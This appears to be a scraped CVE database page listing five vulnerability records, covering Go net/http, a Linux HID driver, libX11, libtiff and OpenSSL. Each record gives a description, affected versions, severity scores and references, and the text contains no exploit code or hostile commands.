When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not. A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Go standard library | net/http |
Version: 0 ≤ Version: 1.22.0-0 ≤ |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-45289", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-06T16:34:47.460894Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-11-04T18:24:28.343Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T20:21:15.333Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/issue/65065" }, { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/569340" }, { "tags": [ "x_transferred" ], "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2024-2600" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240329-0006/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "net/http", "product": "net/http", "programRoutines": [ { "name": "isDomainOrSubdomain" }, { "name": "Client.Do" }, { "name": "Client.Get" }, { "name": "Client.Head" }, { "name": "Client.Post" }, { "name": "Client.PostForm" }, { "name": "Get" }, { "name": "Head" }, { "name": "Post" }, { "name": "PostForm" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.21.8", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.22.1", "status": "affected", "version": "1.22.0-0", "versionType": "semver" } ] }, { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "net/http/cookiejar", "product": "net/http/cookiejar", "programRoutines": [ { "name": "isIP" }, { "name": "Jar.Cookies" }, { "name": "Jar.SetCookies" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.21.8", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.22.1", "status": "affected", "version": "1.22.0-0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "Juho Nurminen of Mattermost" } ], "descriptions": [ { "lang": "en", "value": "When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as \"Authorization\" or \"Cookie\". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not. A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-05T22:22:30.306Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/issue/65065" }, { "url": "https://go.dev/cl/569340" }, { "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "url": "https://pkg.go.dev/vuln/GO-2024-2600" }, { "url": "https://security.netapp.com/advisory/ntap-20240329-0006/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "Incorrect forwarding of sensitive headers and cookies on HTTP redirect in net/http" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2023-45289", "datePublished": "2024-03-05T22:22:30.306Z", "dateReserved": "2023-10-06T17:06:26.221Z", "dateUpdated": "2024-11-04T18:24:28.343Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52529
Vulnerability from cvelistv5
Published
2024-03-02 21:52
Modified
2024-12-19 08:21
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
HID: sony: Fix a potential memory leak in sony_probe()
If an error occurs after a successful usb_alloc_urb() call, usb_free_urb()
should be called.
References
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-52529", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-06T16:05:55.774049Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-770", "description": "CWE-770 Allocation of Resources Without Limits or Throttling", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-01T16:02:10.257Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:20.670Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/bb0707fde7492121917fd9ddb43829e96ec0bb9e" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/f237b17611fa3501f43f12d1cb64323e10fdcb4f" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/f566efa7de1e35e6523f4acbaf85068a540be07d" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/e1cd4004cde7c9b694bbdd8def0e02288ee58c74" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "drivers/hid/hid-sony.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "bb0707fde7492121917fd9ddb43829e96ec0bb9e", "status": "affected", "version": "fb1a79a6b6e1223ddb18f12aa35e36f832da2290", "versionType": "git" }, { "lessThan": "f237b17611fa3501f43f12d1cb64323e10fdcb4f", "status": "affected", "version": "fb1a79a6b6e1223ddb18f12aa35e36f832da2290", "versionType": "git" }, { "lessThan": "f566efa7de1e35e6523f4acbaf85068a540be07d", "status": "affected", "version": "fb1a79a6b6e1223ddb18f12aa35e36f832da2290", "versionType": "git" }, { "lessThan": "e1cd4004cde7c9b694bbdd8def0e02288ee58c74", "status": "affected", "version": "fb1a79a6b6e1223ddb18f12aa35e36f832da2290", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "drivers/hid/hid-sony.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "5.14" }, { "lessThan": "5.14", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.135", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.57", "versionType": "semver" }, { "lessThanOrEqual": "6.5.*", "status": "unaffected", "version": "6.5.7", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.6", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: sony: Fix a potential memory leak in sony_probe()\n\nIf an error occurs after a successful usb_alloc_urb() call, usb_free_urb()\nshould be called." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:21:32.748Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/bb0707fde7492121917fd9ddb43829e96ec0bb9e" }, { "url": "https://git.kernel.org/stable/c/f237b17611fa3501f43f12d1cb64323e10fdcb4f" }, { "url": "https://git.kernel.org/stable/c/f566efa7de1e35e6523f4acbaf85068a540be07d" }, { "url": "https://git.kernel.org/stable/c/e1cd4004cde7c9b694bbdd8def0e02288ee58c74" } ], "title": "HID: sony: Fix a potential memory leak in sony_probe()", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52529", "datePublished": "2024-03-02T21:52:34.217Z", "dateReserved": "2024-02-20T12:30:33.318Z", "dateUpdated": "2024-12-19T08:21:32.748Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-43785
Vulnerability from cvelistv5
Published
2023-10-10 12:26
Modified
2024-11-23 02:02
Severity ?
EPSS score ?
Summary
A vulnerability was found in libX11 due to a boundary condition within the _XkbReadKeySyms() function. This flaw allows a local user to trigger an out-of-bounds read error and read the contents of memory on the system.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2145 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2973 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-43785 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2242252 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 0 ≤ |
||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-43785", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-04-25T15:44:16.523489Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:26:00.384Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T19:52:11.086Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2145", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2145" }, { "name": "RHSA-2024:2973", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2973" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43785" }, { "name": "RHBZ#2242252", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242252" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231103-0006/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.freedesktop.org/xorg/lib/libx11", "defaultStatus": "unaffected", "packageName": "libX11", "versions": [ { "lessThan": "1.8.7", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "libX11", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.6.8-8.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "libX11", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.0-9.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libX11", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libX11", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" } ], "datePublic": "2023-10-04T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in libX11 due to a boundary condition within the _XkbReadKeySyms() function. This flaw allows a local user to trigger an out-of-bounds read error and read the contents of memory on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T02:02:39.835Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2145", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2145" }, { "name": "RHSA-2024:2973", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2973" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43785" }, { "name": "RHBZ#2242252", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242252" } ], "timeline": [ { "lang": "en", "time": "2023-10-05T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-10-04T00:00:00+00:00", "value": "Made public." } ], "title": "Libx11: out-of-bounds memory access in _xkbreadkeysyms()", "x_redhatCweChain": "CWE-787: Out-of-bounds Write" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-43785", "datePublished": "2023-10-10T12:26:02.015Z", "dateReserved": "2023-09-22T09:52:31.108Z", "dateUpdated": "2024-11-23T02:02:39.835Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-41175
Vulnerability from cvelistv5
Published
2023-10-05 18:55
Modified
2024-12-04 07:16
Severity ?
EPSS score ?
Summary
A vulnerability was found in libtiff due to multiple potential integer overflows in raw2tiff.c. This flaw allows remote attackers to cause a denial of service or possibly execute an arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2289 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-41175 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2235264 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 0 ≤ |
||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-41175", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-04-29T19:34:04.451018Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:21:32.785Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T18:54:04.334Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2289", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2289" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-41175" }, { "name": "RHBZ#2235264", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2235264" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.com/libtiff/libtiff", "defaultStatus": "unaffected", "packageName": "libtiff", "versions": [ { "lessThan": "4.6.0", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.4.0-12.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "compact-libtiff", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "compat-libtiff3", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "mingw-libtiff", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Arie Haenel (Intel ASSERT), Polina Frolov (Intel ASSERT), Yaakov Cohen (Intel ASSERT), and Yocheved Butterman (Intel ASSERT) for reporting this issue." } ], "datePublic": "2023-07-21T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in libtiff due to multiple potential integer overflows in raw2tiff.c. This flaw allows remote attackers to cause a denial of service or possibly execute an arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-190", "description": "Integer Overflow or Wraparound", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-12-04T07:16:52.955Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2289", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2289" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-41175" }, { "name": "RHBZ#2235264", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2235264" } ], "timeline": [ { "lang": "en", "time": "2023-07-24T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-07-21T00:00:00+00:00", "value": "Made public." } ], "title": "Libtiff: potential integer overflow in raw2tiff.c", "x_redhatCweChain": "CWE-190: Integer Overflow or Wraparound" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-41175", "datePublished": "2023-10-05T18:55:26.876Z", "dateReserved": "2023-08-25T09:21:36.645Z", "dateUpdated": "2024-12-04T07:16:52.955Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6237
Vulnerability from cvelistv5
Published
2024-04-25 06:27
Modified
2024-11-01 14:28
Severity ?
EPSS score ?
Summary
Issue summary: Checking excessively long invalid RSA public keys may take
a long time.
Impact summary: Applications that use the function EVP_PKEY_public_check()
to check RSA public keys may experience long delays. Where the key that
is being checked has been obtained from an untrusted source this may lead
to a Denial of Service.
When function EVP_PKEY_public_check() is called on RSA public keys,
a computation is done to confirm that the RSA modulus, n, is composite.
For valid RSA keys, n is a product of two or more large primes and this
computation completes quickly. However, if n is an overly large prime,
then this computation would take a long time.
An application that calls EVP_PKEY_public_check() and supplies an RSA key
obtained from an untrusted source could be vulnerable to a Denial of Service
attack.
The function EVP_PKEY_public_check() is not called from other OpenSSL
functions however it is called from the OpenSSL pkey command line
application. For that reason that application is also vulnerable if used
with the '-pubin' and '-check' options on untrusted data.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are affected by this issue.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:21:18.096Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20240115.txt" }, { "name": "3.0.13 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/18c02492138d1eb8b6548cb26e7b625fb2414a2a" }, { "name": "3.1.5 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/a830f551557d3d66a84bbb18a5b889c640c36294" }, { "name": "3.2.1 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/0b0f7abfb37350794a4b8960fafc292cd5d1b84d" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/11/1" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240531-0007/" } ], "title": "CVE Program Container" }, { "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-6237", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-20T14:44:52.382969Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-11-01T14:28:51.338Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.0.13", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "3.1.5", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.2.1", "status": "affected", "version": "3.2.0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "OSS-Fuzz" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Tomas Mraz" } ], "datePublic": "2024-01-15T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Issue summary: Checking excessively long invalid RSA public keys may take\u003cbr\u003ea long time.\u003cbr\u003e\u003cbr\u003eImpact summary: Applications that use the function EVP_PKEY_public_check()\u003cbr\u003eto check RSA public keys may experience long delays. Where the key that\u003cbr\u003eis being checked has been obtained from an untrusted source this may lead\u003cbr\u003eto a Denial of Service.\u003cbr\u003e\u003cbr\u003eWhen function EVP_PKEY_public_check() is called on RSA public keys,\u003cbr\u003ea computation is done to confirm that the RSA modulus, n, is composite.\u003cbr\u003eFor valid RSA keys, n is a product of two or more large primes and this\u003cbr\u003ecomputation completes quickly. However, if n is an overly large prime,\u003cbr\u003ethen this computation would take a long time.\u003cbr\u003e\u003cbr\u003eAn application that calls EVP_PKEY_public_check() and supplies an RSA key\u003cbr\u003eobtained from an untrusted source could be vulnerable to a Denial of Service\u003cbr\u003eattack.\u003cbr\u003e\u003cbr\u003eThe function EVP_PKEY_public_check() is not called from other OpenSSL\u003cbr\u003efunctions however it is called from the OpenSSL pkey command line\u003cbr\u003eapplication. For that reason that application is also vulnerable if used\u003cbr\u003ewith the \u0027-pubin\u0027 and \u0027-check\u0027 options on untrusted data.\u003cbr\u003e\u003cbr\u003eThe OpenSSL SSL/TLS implementation is not affected by this issue.\u003cbr\u003e\u003cbr\u003eThe OpenSSL 3.0 and 3.1 FIPS providers are affected by this issue." } ], "value": "Issue summary: Checking excessively long invalid RSA public keys may take\na long time.\n\nImpact summary: Applications that use the function EVP_PKEY_public_check()\nto check RSA public keys may experience long delays. Where the key that\nis being checked has been obtained from an untrusted source this may lead\nto a Denial of Service.\n\nWhen function EVP_PKEY_public_check() is called on RSA public keys,\na computation is done to confirm that the RSA modulus, n, is composite.\nFor valid RSA keys, n is a product of two or more large primes and this\ncomputation completes quickly. However, if n is an overly large prime,\nthen this computation would take a long time.\n\nAn application that calls EVP_PKEY_public_check() and supplies an RSA key\nobtained from an untrusted source could be vulnerable to a Denial of Service\nattack.\n\nThe function EVP_PKEY_public_check() is not called from other OpenSSL\nfunctions however it is called from the OpenSSL pkey command line\napplication. For that reason that application is also vulnerable if used\nwith the \u0027-pubin\u0027 and \u0027-check\u0027 options on untrusted data.\n\nThe OpenSSL SSL/TLS implementation is not affected by this issue.\n\nThe OpenSSL 3.0 and 3.1 FIPS providers are affected by this issue." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-606", "description": "CWE-606 Unchecked Input for Loop Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-14T14:55:56.955Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20240115.txt" }, { "name": "3.0.13 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/18c02492138d1eb8b6548cb26e7b625fb2414a2a" }, { "name": "3.1.5 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/a830f551557d3d66a84bbb18a5b889c640c36294" }, { "name": "3.2.1 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/0b0f7abfb37350794a4b8960fafc292cd5d1b84d" } ], "source": { "discovery": "UNKNOWN" }, "title": "Excessive time spent checking invalid RSA public keys", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", 